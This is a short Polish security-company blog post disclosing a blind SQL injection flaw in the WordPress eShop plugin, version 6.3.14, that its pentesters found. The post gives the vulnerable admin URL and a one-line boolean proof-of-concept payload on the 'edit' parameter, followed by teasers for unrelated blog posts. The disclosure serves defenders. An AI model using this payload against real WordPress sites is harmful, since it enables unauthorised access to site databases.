Powrót

Blind SQL Injection – WordPress Plugin eShop

Kategorie Blog

Realizując prace związane z Testami Penetracyjnymi platformy ecommerce uruchomionej na silniku WordPress naszego Klienta nasi pentesterzy odnaleźli podatność Blind SQL Injection w pluginie eShop.

Podatność odnaleziona w pluginie WordPressa eShop w najnowszej wersji 6.3.14 pozwala na wykonanie ataku SQL Injection.
Plugin został pobrany z repozytorium pluginów WordPress ponad 631 tysięcy razy.
Aktualnie według repozytorium jest aktywnie używany na 9000+ aktywnych instalacjach WordPress.

 

Podatność

http://[site]/wp-admin/admin.php?page=eshop-downloads.php&edit=[SQLinjection]

PoC:

http://[site]/wp-admin/admin.php?page=eshop-downloads.php&edit=2 AND

3022=3022

Zobacz po przeczytaniu jeszcze

Serwer WordPress – Jaki wybrać?
2023-04-27
WordPress to popularny system zarządzania treścią (CMS), który umożliwia łatwe tworzenie i zarządzanie stronami internetowymi. Pierwsza wersja WordPressa została wydana w 2003 roku i od tego czasu stał się jednym z najpopularniejszych CMS-ów na świecie. Dzięki otwartemu kodowi źródłowemu i…
Czytaj dalej
Entity Framework dla początkujących
2015-12-11
1. Co to jest Entity Framework i do czego go używamy?   Entity Framework jest czwartą najczęściej pobieraną biblioteką ze strony NuGet.org, zaraz po jQuery oraz bibliotekami ASP.NET oraz Newtonsoft.JSON Jest on bardzo dobrym ORM (Object-Relational Mapping), przeznaczonym do budowania…
Czytaj dalej
ZdalnyAdmin ma nowy adres
2019-07-01
Uprzejmie zawiadamiamy, że z dniem 21 marca 2019r. uległ zmianie adres naszej Spółki na: Remote Admin Sp. Z o.o. 40-101 Katowice ul Chorzowska 150 Silesia Business Park – budynek B, piętro 5 Jednocześnie informujemy, że zmianie ulega jedynie ADRES firmy…
Czytaj dalej